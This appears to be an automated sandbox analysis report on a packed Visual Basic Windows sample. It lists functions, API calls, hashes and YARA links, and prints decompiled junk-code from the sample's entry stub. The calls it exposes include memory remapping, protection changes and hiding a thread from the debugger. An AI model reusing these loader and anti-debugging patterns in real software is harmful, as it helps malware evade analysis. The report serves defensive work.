Instruction Fuzzy Hash: 20F04F32B29241DFD72EAB90C04D3D47B79EF02604B98D89498124A83EF36218EDCF91

Uniqueness

Uniqueness Score: -1.00%

Function 02225544, Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON

Download Yara Rule

APIs

NtMapViewOfSection.NTDLL(00000004), ref: 02225572

Memory Dump Source

Source File: 00000000.00000002.247315010.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 8e32ee2e504126286bf8aa7957d60147f9c761e93e37d04b61f8000f741c99a3
Instruction ID: 580a943ddf2ef96872c59f51386618f42e767baffc5d89ae17a233e0d68087ca
Opcode Fuzzy Hash: 8e32ee2e504126286bf8aa7957d60147f9c761e93e37d04b61f8000f741c99a3
Instruction Fuzzy Hash: 2AE05972A25500DF876E5B51C45D198B779EE45550314DC44A4134AC3DF26218EE8F91

Uniqueness

Uniqueness Score: -1.00%

Function 02224EE8, Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000000,?,02224BD1,00000040,02220510,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02224F01

Memory Dump Source

Source File: 00000000.00000002.247315010.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
Instruction ID: 8f5be131a22dbd2915fdb11b102d5d31c6b110a07b1c5addfdb7a0585f941792
Opcode Fuzzy Hash: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
Instruction Fuzzy Hash: 37C012E02240002E68048A28CD48C2BB2AA86C4A28B10C32CB832222CCC930EC048032

Uniqueness

Uniqueness Score: -1.00%

Function 004139C0, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 77COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(0040301C,0qV), ref: 00413A1C
__vbaObjSet.MSVBVM60(?,00000000), ref: 00413A35
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403CC8,00000130), ref: 00413A5C
#591.MSVBVM60(?), ref: 00413A76
__vbaStrMove.MSVBVM60 ref: 00413A81
__vbaStrCmp.MSVBVM60(String,00000000), ref: 00413A8D
__vbaFreeStr.MSVBVM60 ref: 00413A96
__vbaFreeObj.MSVBVM60 ref: 00413A9F
__vbaFreeVar.MSVBVM60 ref: 00413AA8

Strings

String, xrefs: 00413A88
0qV, xrefs: 004139F7, 00413A12, 00413A22

Memory Dump Source

Source File: 00000000.00000002.246757240.000000000040E000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.246722797.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.246732813.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.246772099.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.246784901.0000000000417000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$#591CheckHresultMoveNew2
String ID: 0qV$String
API String ID: 609433361-3972713514
Opcode ID: d10e9cc06559d4d2c59729cfd59cb4c14c3888c9655facad00322e03a7fe0766
Instruction ID: 41e643e41f45605096168567421dfd52d2313328b5d404d746b23621bc7a88a5
Opcode Fuzzy Hash: d10e9cc06559d4d2c59729cfd59cb4c14c3888c9655facad00322e03a7fe0766
Instruction Fuzzy Hash: 3C31B375910208EBCB00DF95D989ADEBFB8FF58741F10416AE441B72A0D7785A85CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00401378, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 61%

			_entry_(signed int __eax, signed int __ebx, signed int __ecx, void* __edx, void* __edi, signed int __esi) {
				signed int _t151;
				void* _t203;
				signed int _t221;
				intOrPtr _t233;

				_t181 = __ebx;
				_push("VB5!6&*"); // executed
				L00401370(); // executed
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax ^ __eax;
				 *__eax =  *__eax + __eax;
				_t151 = __eax + 1;
				 *_t151 =  *_t151 + _t151;
				 *_t151 =  *_t151 + _t151;
				 *_t151 =  *_t151 + _t151;
				 *((intOrPtr*)(__edi + 0x531d74e3)) =  *((intOrPtr*)(__edi + 0x531d74e3)) + _t151;
				asm("sbb eax, 0x4e6d8853");
				asm("scasb");
				asm("fistp word [edx-0xfd75c92]");
				asm("retf");
				 *_t151 =  *_t151 + _t151;
				 *_t151 =  *_t151 + _t151;
				 *_t151 =  *_t151 + _t151;
				 *_t151 =  *_t151 + _t151;
				 *_t151 =  *_t151 + _t151;
				 *_t151 =  *_t151 + _t151;
				asm("lock arpl [edx], bx");
				_t203 = __edx +  *((intOrPtr*)(_t151 + 0x61));
				asm("insb");
				if(_t203 < 0) {
					_t221 =  *(__esi + 0x67) * 0x410800;
					 *_t151 =  *_t151 & __ecx;
					 *_t151 =  *_t151 + _t151;
					 *_t151 =  *_t151 + _t151;
					asm("int3");
					 *_t151 =  *_t151 ^ _t151;
					_t216 = __esi |  *(_t203 + 0x67663e8b);
					asm("psadbw mm0, [edi-0x4e]");
					asm("stosb");
					asm("aam 0xda");
					_t193 = 0x43;
					_t151 =  *0xb594427c;
					asm("adc dword [ebp+0xf563441], 0x3a");
					_t209 = __edi - 1;
					asm("lodsd");
					_t181 = __ebx + __ebx ^  *0xFFFFFFFFB711CFA9;
					asm("cdq");
					asm("iretw");
					asm("adc [edi+0xaa000c], esi");
					asm("pushad");
					asm("rcl dword [ebx], cl");
					 *_t151 =  *_t151 + _t151;
					 *_t151 =  *_t151 + _t151;
					 *_t151 =  *_t151 + _t151;
					 *_t151 =  *_t151 + _t151;
					 *_t151 =  *_t151 + _t151;
					 *_t151 =  *_t151 + _t151;
					 *_t151 =  *_t151 + _t151;
					 *_t151 =  *_t151 + _t151;
					 *_t151 =  *_t151 + _t151;
					 *_t151 =  *_t151 + _t151;
					 *_t151 =  *_t151 + _t151;
					 *_t151 =  *_t151 + _t151;
					 *_t151 =  *_t151 + _t151;
					 *_t151 =  *_t151 + _t151;
					 *_t151 =  *_t151 + _t151;
					 *_t151 =  *_t151 + _t151;
					asm("sbb eax, 0x65000017");
					asm("adc eax, 0xe000000");
					_t7 = _t181 + 0x75;
					 *_t7 =  *((intOrPtr*)(_t181 + 0x75)) + _t203;
					_t233 =  *_t7;
					asm("bound esp, [ecx+0x73]");
					if (_t233 >= 0) goto L12;
				}
				asm("outsd");
			}

0x00401378
0x00401378
0x0040137d
0x00401382
0x00401384
0x00401386
0x00401388
0x0040138a
0x0040138c
0x0040138d
0x0040138f
0x00401391
0x00401393
0x00401397
0x0040139c
0x0040139d
0x004013a3
0x004013a4
0x004013a6
0x004013a8
0x004013aa
0x004013ac
0x004013ae
0x004013b0
0x004013b3
0x004013b6
0x004013b7
0x004013b9
0x004013c0
0x004013c3
0x004013c5
0x004013c9
0x004013ca
0x004013cc
0x004013d2
0x004013d6
0x004013d7
0x004013e0
0x004013e2
0x004013e7
0x004013ee
0x004013ef
0x004013f0
0x004013f1
0x004013f2
0x004013f4
0x004013fa
0x004013fb
0x00401401
0x00401403
0x00401405
0x00401407
0x00401409
0x0040140b
0x0040140d
0x0040140f
0x00401411
0x00401413
0x00401415
0x00401417
0x00401419
0x0040141b
0x0040141d
0x0040141f
0x00401421
0x00401426
0x0040142b
0x0040142b
0x0040142b
0x0040142e
0x00401431
0x00401431
0x00401432

APIs

#100.MSVBVM60(VB5!6&*), ref: 0040137D

Strings

VB5!6&*, xrefs: 00401378

Memory Dump Source

Source File: 00000000.00000002.246732813.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.246722797.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.246757240.000000000040E000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.246772099.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.246784901.0000000000417000.00000002.00020000.sdmp Download File

Similarity

API ID: #100
String ID: VB5!6&*
API String ID: 1341478452-3593831657
Opcode ID: 2b6508af3a7eb40267221583edd419167c4e616643a681581ad1736d41168e7c
Instruction ID: 668858056bcf004401fc86940a93389c86fd92bb166aefe7ce6e0e096fc317f1
Opcode Fuzzy Hash: 2b6508af3a7eb40267221583edd419167c4e616643a681581ad1736d41168e7c
Instruction Fuzzy Hash: 47E0240184E3C54EC7139B745A285457F304C1366431E09EBD4C0CE4E3D55D5908C36B

Uniqueness

Uniqueness Score: -1.00%

Function 02220698, Relevance: 1.7, APIs: 1, Instructions: 248COMMON

Download Yara Rule

APIs

Part of subcall function 02223CB3: LoadLibraryA.KERNELBASE(0000C961,00000000,?,022225E4,?), ref: 02223D7E

TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,?,00000004,00000000,?,00000000,?,00003000,00000004,?,?,00000004), ref: 02222408

Memory Dump Source

Source File: 00000000.00000002.247315010.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Similarity

API ID: LibraryLoadProcessTerminate
String ID:
API String ID: 3349790660-0
Opcode ID: d6aeda5a5c0b08b80ae22a14b5c4fd3872a1a35680de8ce997aa9d73cc8d355b
Instruction ID: becad3e3c09d72d0c032109695d9096671cb472963204cfc3f74fc6c7657f064
Opcode Fuzzy Hash: d6aeda5a5c0b08b80ae22a14b5c4fd3872a1a35680de8ce997aa9d73cc8d355b
Instruction Fuzzy Hash: 66719030624322B6EB346AE4CC95BFD3267AF52724F640119EC46A718CC7BFD58DCA52

Uniqueness

Uniqueness Score: -1.00%

Function 02220613, Relevance: 1.7, APIs: 1, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.247315010.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 5a496858f590d788512fbb5c6e1eb79dfce314db6f2f1cf247efefa9a8641340
Instruction ID: d4f1cf5fff90fb6673219fa8791e6c49b1f659e72f612309b5584797a4a696b7
Opcode Fuzzy Hash: 5a496858f590d788512fbb5c6e1eb79dfce314db6f2f1cf247efefa9a8641340
Instruction Fuzzy Hash: 6561AE31A20322BADB346ED4CC987FD3227AF52764F244519EC06A719CCB7B858DCA52

Uniqueness

Uniqueness Score: -1.00%

Function 022206A3, Relevance: 1.7, APIs: 1, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.247315010.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7885922f6f68625f75328016d8282e6d6c459a43de1fc878f7e2bcb282ee8c64
Instruction ID: fb25cd21037833897100c3470a12e24a4fd29de7735ce11714b7d322875cc5b9
Opcode Fuzzy Hash: 7885922f6f68625f75328016d8282e6d6c459a43de1fc878f7e2bcb282ee8c64
Instruction Fuzzy Hash: 9451C030A20322BADB386AD8C8947FD22279F52764F640519DC46A71DCCB7F858DCA52

Uniqueness

Uniqueness Score: -1.00%

Function 0222072D, Relevance: 1.7, APIs: 1, Instructions: 172COMMON

Download Yara Rule

APIs

Part of subcall function 02223CB3: LoadLibraryA.KERNELBASE(0000C961,00000000,?,022225E4,?), ref: 02223D7E

TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,?,00000004,00000000,?,00000000,?,00003000,00000004,?,?,00000004), ref: 02222408

Memory Dump Source

Source File: 00000000.00000002.247315010.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Similarity

API ID: LibraryLoadProcessTerminate
String ID:
API String ID: 3349790660-0
Opcode ID: d651ba0287b8b06794bc308725e3e697ac96edd55a26e3ab7c8b2ad5479bd3f9
Instruction ID: 979a3ab0dabc2f5f4313d8e06f8153bab71389fd42760bca3bc60ed677c4fb1e
Opcode Fuzzy Hash: d651ba0287b8b06794bc308725e3e697ac96edd55a26e3ab7c8b2ad5479bd3f9
Instruction Fuzzy Hash: 8B519C31A20311FAEB386B94C8497ED2736AF52764F244909DC02A74ACD77B94CDCE52

Uniqueness

Uniqueness Score: -1.00%

Function 022207AB, Relevance: 1.7, APIs: 1, Instructions: 153COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,?,00000004,00000000,?,00000000,?,00003000,00000004,?,?,00000004), ref: 02222408

Part of subcall function 02223CB3: LoadLibraryA.KERNELBASE(0000C961,00000000,?,022225E4,?), ref: 02223D7E

Memory Dump Source

Source File: 00000000.00000002.247315010.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Similarity

API ID: LibraryLoadProcessTerminate
String ID:
API String ID: 3349790660-0
Opcode ID: b78a4a2f1853df3b7adaf8b166bb151cad7ae439796f025620ab78a69449b9c9
Instruction ID: 34dd75e149d816da51b82a6273ea042a18748f9bc352b2b1f32f9f522c20089b
Opcode Fuzzy Hash: b78a4a2f1853df3b7adaf8b166bb151cad7ae439796f025620ab78a69449b9c9
Instruction Fuzzy Hash: D941ED30A20352BAEB382A94C849BFC2726AF52364F644509DC46A70DCC7BB94CDCA42

Uniqueness

Uniqueness Score: -1.00%

Function 02220829, Relevance: 1.6, APIs: 1, Instructions: 127COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,?,00000004,00000000,?,00000000,?,00003000,00000004,?,?,00000004), ref: 02222408

Memory Dump Source

Source File: 00000000.00000002.247315010.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: c9e3258d23e56050dbce95e7f4839ab8aaa7cd02a19e55e9ea15e899a3335b51
Instruction ID: 0160660f749fcd06a9b27ba3371b690f069dd0a1585a19610ab49872bd5f49a8
Opcode Fuzzy Hash: c9e3258d23e56050dbce95e7f4839ab8aaa7cd02a19e55e9ea15e899a3335b51
Instruction Fuzzy Hash: 8941C031A20352FAEF382AD4C8497FC2326AF52334F644515DC06A709CC7AB95CDCA52

Uniqueness

Uniqueness Score: -1.00%

Function 02220885, Relevance: 1.6, APIs: 1, Instructions: 109COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,?,00000004,00000000,?,00000000,?,00003000,00000004,?,?,00000004), ref: 02222408

Memory Dump Source

Source File: 00000000.00000002.247315010.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 547e84b6e1bdb6827930bc9914047c3b2838fce7edd5ace3392f9e72d6507bcc
Instruction ID: 34a32523380522626cf35adde2ff0945c66f14a33b29eafaae6ef0a4a95b670f
Opcode Fuzzy Hash: 547e84b6e1bdb6827930bc9914047c3b2838fce7edd5ace3392f9e72d6507bcc
Instruction Fuzzy Hash: C5318F30A24322FADF386AD8C4897FC2722AF12364F644515DC16A74ADC7AF95CDCA52

Uniqueness

Uniqueness Score: -1.00%

Function 022208DD, Relevance: 1.6, APIs: 1, Instructions: 90COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,?,00000004,00000000,?,00000000,?,00003000,00000004,?,?,00000004), ref: 02222408

Memory Dump Source

Source File: 00000000.00000002.247315010.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: e2f984da3369cecd88e8a2844f550be882ef9fa83dcf9c0fab4412274f208b1e
Instruction ID: 01aabafb8388b7f2c5ae039cf660d43cf4772ff521cdc1f8940764438a5843cc
Opcode Fuzzy Hash: e2f984da3369cecd88e8a2844f550be882ef9fa83dcf9c0fab4412274f208b1e
Instruction Fuzzy Hash: 4D314E30524352FEDF396BD8C4897FC2732AF12324F6485059C16A64ADC7AB95CDCA52

Uniqueness

Uniqueness Score: -1.00%

Function 02220971, Relevance: 1.6, APIs: 1, Instructions: 70COMMON

Download Yara Rule

APIs

Part of subcall function 02223CB3: LoadLibraryA.KERNELBASE(0000C961,00000000,?,022225E4,?), ref: 02223D7E

TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,?,00000004,00000000,?,00000000,?,00003000,00000004,?,?,00000004), ref: 02222408

Memory Dump Source

Source File: 00000000.00000002.247315010.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Similarity

API ID: LibraryLoadProcessTerminate
String ID:
API String ID: 3349790660-0
Opcode ID: 71e613919b043c317f4af43a7e301fb73cb2a4815692ab625543f5a83fb65882
Instruction ID: 07f6da1a3742635c22e3dbc6ed12917b976b32ada70c41c78e0755199896c916
Opcode Fuzzy Hash: 71e613919b043c317f4af43a7e301fb73cb2a4815692ab625543f5a83fb65882
Instruction Fuzzy Hash: 97214C30A18352FEEB366BA0C8097EC3B21EF11314F54854498155A4ADD7BB59CECF52

Uniqueness

Uniqueness Score: -1.00%

Function 022209CB, Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,?,00000004,00000000,?,00000000,?,00003000,00000004,?,?,00000004), ref: 02222408

Memory Dump Source

Source File: 00000000.00000002.247315010.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 682df330db34661a2a4cfaa7c6fbe4e07a8235d632fcbac05d50e0938efdf308
Instruction ID: 7a40ece9894829c41d149021e02a707ce22be9cdc80d0181a3e573935ce0a990
Opcode Fuzzy Hash: 682df330db34661a2a4cfaa7c6fbe4e07a8235d632fcbac05d50e0938efdf308
Instruction Fuzzy Hash: B4118C30928392FEDB356BE4C8097AC2B20AF22328F5486449C155A49DC7BF55CDCF62

Uniqueness

Uniqueness Score: -1.00%

Function 0222243D, Relevance: 1.6, APIs: 1, Instructions: 50libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(0000C961,00000000,?,022225E4,?), ref: 02223D7E

Memory Dump Source

Source File: 00000000.00000002.247315010.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: a5979a02631452f6ed864d98319808c75c18f62848ff6f5090352167c4095b93
Instruction ID: df54bd3ab3f190e15ae5ef88dd7a60fc54d331162771db3bd4456fb712e3d1ca
Opcode Fuzzy Hash: a5979a02631452f6ed864d98319808c75c18f62848ff6f5090352167c4095b93
Instruction Fuzzy Hash: 5301F571A34624BFC7393BD0E5087E92735DF01760F209990F8524A02DE35A88CECE92

Uniqueness

Uniqueness Score: -1.00%

Function 02223C87, Relevance: 1.5, APIs: 1, Instructions: 38libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(0000C961,00000000,?,022225E4,?), ref: 02223D7E

Memory Dump Source

Source File: 00000000.00000002.247315010.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 2336b91b872bc9aa5390d7a149dfb778d4b5e266ae6f85c92d2bd273312c259c
Instruction ID: cc5e364511b259a654909bf29b52891494b29ec1c6885922ab44e2eb70dd9efd
Opcode Fuzzy Hash: 2336b91b872bc9aa5390d7a149dfb778d4b5e266ae6f85c92d2bd273312c259c
Instruction Fuzzy Hash: BBF08171A24664FFC7297BD0E4087EC7736EF01250F109980F8628E42DE76A58CECE92

Uniqueness

Uniqueness Score: -1.00%

Function 02221BAC, Relevance: 1.5, APIs: 1, Instructions: 36libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(0000C961,00000000,?,022225E4,?), ref: 02223D7E

Memory Dump Source

Source File: 00000000.00000002.247315010.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 3dceec82464b9efae45d01ad16f3d2782076afae19465bd08b7249194b51f0fb
Instruction ID: 89f1eafb09717a3242f7b162e744a76c509a819a8240f15b49ad9ce710410d5b
Opcode Fuzzy Hash: 3dceec82464b9efae45d01ad16f3d2782076afae19465bd08b7249194b51f0fb
Instruction Fuzzy Hash: 06F0A080534675B9DA24BBE4BA00FFD1516CB02720F2042A5F8918910DD75FC58DCD92

Uniqueness

Uniqueness Score: -1.00%

Function 02220A33, Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,?,00000004,00000000,?,00000000,?,00003000,00000004,?,?,00000004), ref: 02222408

Memory Dump Source

Source File: 00000000.00000002.247315010.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: a8936c789a3079064ac3492b7455831d9a88ff0c252198c1236ec1326974c7cb
Instruction ID: 19e1cec2c755b14f35c308c4881de1a69d46a9ee72ef0cbdeeab79e773fc42a9
Opcode Fuzzy Hash: a8936c789a3079064ac3492b7455831d9a88ff0c252198c1236ec1326974c7cb
Instruction Fuzzy Hash: 0FF04931A182D1FFC33A5B94C40C39C7F30AF21314F14898498164A47ED7AB15DE8FA2

Uniqueness

Uniqueness Score: -1.00%

Function 02223CC3, Relevance: 1.5, APIs: 1, Instructions: 33libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(0000C961,00000000,?,022225E4,?), ref: 02223D7E

Memory Dump Source

Source File: 00000000.00000002.247315010.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: b1188da7b3fb96e0b86ecbaa298ea14919b841051ec762e030bb513dc3af41d8
Instruction ID: dd95ede16e0d53cf90c7a7f1a939c060d4a301067d6c59f2e5bff9ca89640cf7
Opcode Fuzzy Hash: b1188da7b3fb96e0b86ecbaa298ea14919b841051ec762e030bb513dc3af41d8
Instruction Fuzzy Hash: F8F06271A24A64FFC7257B90E4086E87735DF01310F149991B8624942DE76648DF8F92

Uniqueness

Uniqueness Score: -1.00%

Function 02223D3D, Relevance: 1.5, APIs: 1, Instructions: 30libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(0000C961,00000000,?,022225E4,?), ref: 02223D7E

Memory Dump Source

Source File: 00000000.00000002.247315010.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: d7858a88e6c0bf0a479c8c2a706b16b7109f5a1fef7d92d4cb14b4bced4698a3
Instruction ID: 9e9632b81a3ef10cdba9b6235e117e9961117b0121a8744ff3cee31484e1872f
Opcode Fuzzy Hash: d7858a88e6c0bf0a479c8c2a706b16b7109f5a1fef7d92d4cb14b4bced4698a3
Instruction Fuzzy Hash: E6F03072A15250EF83676BA1D40D1C87F35EE06550358DC90F8628E93EF66618DF8FE2

Uniqueness

Uniqueness Score: -1.00%

Function 02223CB3, Relevance: 1.5, APIs: 1, Instructions: 29libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(0000C961,00000000,?,022225E4,?), ref: 02223D7E

Memory Dump Source

Source File: 00000000.00000002.247315010.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 58cbc671953dc9767fb7ade38ddf4ad32e45973a49e43bc97bdf4d67ef4f1445
Instruction ID: f0e8ef5f8616341435512aa110bae0491719342b7de1298281d7b756c8bedf7b
Opcode Fuzzy Hash: 58cbc671953dc9767fb7ade38ddf4ad32e45973a49e43bc97bdf4d67ef4f1445
Instruction Fuzzy Hash: 9EE09290434678B9DA24BBE0B900BFD1516CB01310F104295F9918900DC75FC58DCD97

Uniqueness

Uniqueness Score: -1.00%

Function 02223CFF, Relevance: 1.5, APIs: 1, Instructions: 29libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(0000C961,00000000,?,022225E4,?), ref: 02223D7E

Memory Dump Source

Source File: 00000000.00000002.247315010.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 0495954a697af0204cc6a7031dfb207d7530c0ad2e6e74e522ea0deada3908a0
Instruction ID: 2351b0ceaa1632894b44c6b72fecb4a37c0e4c6140dbe80253c20ca31a2d1055
Opcode Fuzzy Hash: 0495954a697af0204cc6a7031dfb207d7530c0ad2e6e74e522ea0deada3908a0
Instruction Fuzzy Hash: 15F03A72A24A50EF876A6B91E40D5D8B735EE01610B24D990B8A24D43DE32658DE8FD2

Uniqueness

Uniqueness Score: -1.00%

Function 02220413, Relevance: 1.5, APIs: 1, Instructions: 28nativethreadCOMMON

Download Yara Rule

APIs

EnumWindows.USER32(0222047D,?,00000000,?,?,?,?,?,?,?,02220157), ref: 0222043E
NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0222052B

Memory Dump Source

Source File: 00000000.00000002.247315010.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Similarity

API ID: EnumInformationThreadWindows
String ID:
API String ID: 1954852945-0
Opcode ID: 3106190940e230360b54e2448aa96adb91dce8c4c742d0492e937f4688ecf7b3
Instruction ID: f1d1c61c0daeeb59f1babc8cd29632b623af479c3007192014ece84f0a8f0cad
Opcode Fuzzy Hash: 3106190940e230360b54e2448aa96adb91dce8c4c742d0492e937f4688ecf7b3
Instruction Fuzzy Hash: 07F05471615240AFC3595B65C4086847B75EF16220F64DC449462CA97DE56158CECF51

Uniqueness

Uniqueness Score: -1.00%

Function 02220A99, Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,?,00000004,00000000,?,00000000,?,00003000,00000004,?,?,00000004), ref: 02222408

Memory Dump Source

Source File: 00000000.00000002.247315010.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 54c029620475dce691da46325aa320ab92823866c9846b05ed970172e9dbfb51
Instruction ID: 53935ff7b5765959689cf83576515e2d202f6633b4e0109ca342d4792240074c
Opcode Fuzzy Hash: 54c029620475dce691da46325aa320ab92823866c9846b05ed970172e9dbfb51
Instruction Fuzzy Hash: CAE0EC72B19140EFC36A1B41D80D7C47B34EF01664B28DD4058239D8BEF55158DF8FA1

Uniqueness

Uniqueness Score: -1.00%

Function 02222725, Relevance: 1.5, APIs: 1, Instructions: 12fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(02220532,80000000,00000001,00000000,00000003,00000000,00000000,022226D0,0222274F,02220532), ref: 0222273B

Memory Dump Source

Source File: 00000000.00000002.247315010.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 155ab0be908f0c9073ab6786d2919a755303e86cfda44655917ade1c814518c9
Instruction ID: 900367366cdbe6d601c81150bc681f02e6b68b9561d5aa492e1afc5f48836694
Opcode Fuzzy Hash: 155ab0be908f0c9073ab6786d2919a755303e86cfda44655917ade1c814518c9
Instruction Fuzzy Hash: 9EC04C713D1300B6FA384A219D56F9A62155B90F01F20841C7F467D0C186F1A620D518

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02222C06, Relevance: 1.4, Strings: 1, Instructions: 125COMMON

Download Yara Rule

Strings

0={,, xrefs: 02222CB3

Memory Dump Source

Source File: 00000000.00000002.247315010.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Similarity

API ID: LibraryLoad
String ID: 0={,
API String ID: 1029625771-63937952
Opcode ID: 82a8f7525f012ff974303ace82dcae6d57bc8ba721b38147af56891636943a09
Instruction ID: 83696af968076b5ebb7e75c012fa508efb35f38988ba77bfd7f091d68f093e25
Opcode Fuzzy Hash: 82a8f7525f012ff974303ace82dcae6d57bc8ba721b38147af56891636943a09
Instruction Fuzzy Hash: E94181B491471ADFCB14EFA0C1507DA7BA3AF88350F209159AC0657348DB76C89ACFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02224B11, Relevance: .2, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.247315010.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID:
API String ID: 3389902171-0
Opcode ID: 673afa38b3bf6444e893614a17212de5f071bad6e85389aef0b8ca38eef38984
Instruction ID: 046f3d26771729f09489bff70aa74b5e206fd72347bd1cee974190d6a56950e0
Opcode Fuzzy Hash: 673afa38b3bf6444e893614a17212de5f071bad6e85389aef0b8ca38eef38984
Instruction Fuzzy Hash: 2981B874A243629FDF25EF78C4C4715BB91EF52324F448399D9A54F2EAC372844AC722

Uniqueness

Uniqueness Score: -1.00%

Function 022219A3, Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.247315010.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

